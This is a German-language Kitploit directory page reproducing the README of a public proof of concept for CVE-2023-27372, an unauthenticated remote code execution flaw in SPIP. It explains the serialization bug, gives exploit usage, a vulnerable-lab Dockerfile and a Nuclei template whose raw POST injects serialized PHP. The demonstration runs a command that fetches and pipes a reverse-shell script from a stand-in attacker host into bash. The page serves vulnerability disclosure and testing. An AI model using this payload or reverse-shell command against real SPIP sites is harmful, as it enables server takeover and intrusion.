Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-27372 — SPIP vor 4.2.1 ermöglicht Remote-Codeausführung über Formularwerte im öffentlichen Bereich, weil die Serialisierung fehlerhaft behandelt wird. Die behobenen Versionen sind 3.2.18, 4.0.10, 4.1.8 und 4.2.1. | Kitploit
Tools/GitHubGitHub/nuts7/cve-2023-27372
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubnuts7/cve-2023-27372

CVE-2023-27372

SPIP vor 4.2.1 ermöglicht Remote-Codeausführung über Formularwerte im öffentlichen Bereich, weil die Serialisierung fehlerhaft behandelt wird. Die behobenen Versionen sind 3.2.18, 4.0.10, 4.1.8 und 4.2.1.

Repository anzeigen
698vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Banner


CVE-2023-27372

SPIP vor 4.2.1 ermöglicht Remote Code Execution über Formularwerte im öffentlichen Bereich, da die Serialisierung falsch gehandhabt wird. Die behobenen Versionen sind 3.2.18, 4.0.10, 4.1.8 und 4.2.1. Dieser PoC nutzt eine PHP-Code-Injection in SPIP aus. Die Schwachstelle liegt im Parameter oubli und ermöglicht es einem nicht authentifizierten Benutzer, beliebige Befehle mit den Rechten des Web-Benutzers auszuführen. Betroffen sind die Zweige 3.2, 4.0, 4.1 und 4.2. Anfällig sind die Versionen <3.2.18, <4.0.10, <4.1.18 und <4.2.1.

Erklärung der Schwachstelle

Diese Schwachstelle nutzt 2 Fehler aus, um eine zu großzügige Funktion zur Variablenbereinigung zu missbrauchen und PHP-Code einzuschleusen:

  • Verwendung eines gefährlichen Tags (#ENV**) in der Vorlage der Passwortzurücksetzung:
root@kitploit:~
<!-- File : /squelettes-dist/formulaires/oubli.html -->
<input[ (#HTML5|?{type="email" class="text email" autofocus="autofocus" required="required",type="text" class="text"})] name='oubli' id='oubli' value="#ENV**{oubli}" autocapitalize="off" autocorrect="off" />
  • In der Funktion protege_champ() wird der falsche reguläre Ausdruck verwendet, da serialisierte Zeichenfolgen nicht verarbeitet werden:
root@kitploit:~
<!-- File : /ecrire/balise/formulaire_.php -->
if ((preg_match(",^[abis]:\d+[:;],", $texte) and @unserialize($texte) != false) or is_null($texte)) {
    return $texte; // $texte = $_POST['oubli']

Es ist möglich, eine serialisierte PHP-Zeichenfolge mit PHP-Code in die Variable $_POST['oubli'] einzuschleusen, wenn ein Passwort am Endpunkt /spip.php?page=spip_pass zurückgesetzt wird, um eine RCE auf dem Server zu erzielen.

Manuelles Beispiel:

Burp_screenshot

Phpinfo_screenshot

Verwendung

root@kitploit:~
❯ ./CVE-2023-27372.py -h
usage: CVE-2023-27372.py [-h] -u URL -c COMMAND [-v]

Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     SPIP application base URL
  -c COMMAND, --command COMMAND
                        Command to execute
  -v, --verbose         Verbose mode. (default: False)

Demonstration

root@kitploit:~
./CVE-2023-27372.py -u https://spip.local.com -c 'curl https://attacker.server/revshell.sh|bash' -v

Wie richte ich die Testumgebung ein?

Dockerfile:

root@kitploit:~
FROM ubuntu:20.04 as base
ARG DEBIAN_FRONTEND=noninteractive
RUN apt-get update && apt-get install -y \
		php \
		php-xml \
		php-zip \
		php-sqlite3 \
		unzip
ADD https://files.spip.net/spip/archives/spip-v4.2.0.zip /tmp/
RUN unzip /tmp/spip-v4.2.0.zip -d /var/www/
RUN cd /var/www/ && php -S 0.0.0.0:8000

Nuclei-Vorlage

Nuclei_screen

root@kitploit:~
id: CVE-2023-27372

info:
  name: SPIP - Remote Command Execution
  author: DhiyaneshDK,nuts7
  severity: critical
  description: |
    SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
  reference:
    - https://packetstormsecurity.com/files/171921/SPIP-Remote-Command-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27372
    - https://github.com/nuts7/CVE-2023-27372
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27372
  metadata:
    max-request: 1
    shodan-query: html:"spip.php?page=backend"
    verified: "true"
  tags: cve,cve2023,spip,rce

http:
  - raw:
      - |
        GET /spip.php?page=spip_pass HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /spip.php?page=spip_pass HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        page=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:"<?php phpinfo(); ?>";

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "PHP Extension"
          - "PHP Version"
          - "<!DOCTYPE html"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        group: 1
        internal: true
        part: body_1
        regex:
          - "name='formulaire_action_args'[^>]*value='([^']*)'"

      - type: regex
        part: body_2
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'

Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2023-27372
  • https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-2-1-SPIP-4-1-8-SPIP-4-0-10-et.html
  • https://git.spip.net/spip/spip/commit/5aedf49b89415a4df3eb775eee3801a2b4b88266
  • https://git.spip.net/spip/spip/commit/96fbeb38711c6706e62457f2b732a652a04a409d
  • https://www.debian.org/security/2023/dsa-5367
  • http://packetstormsecurity.com/files/171921/SPIP-Remote-Command-Execution.html
  • https://therealcoiffeur.com/c11010
  • https://github.com/rapid7/metasploit-framework/pull/17711/files
Tool herunterladen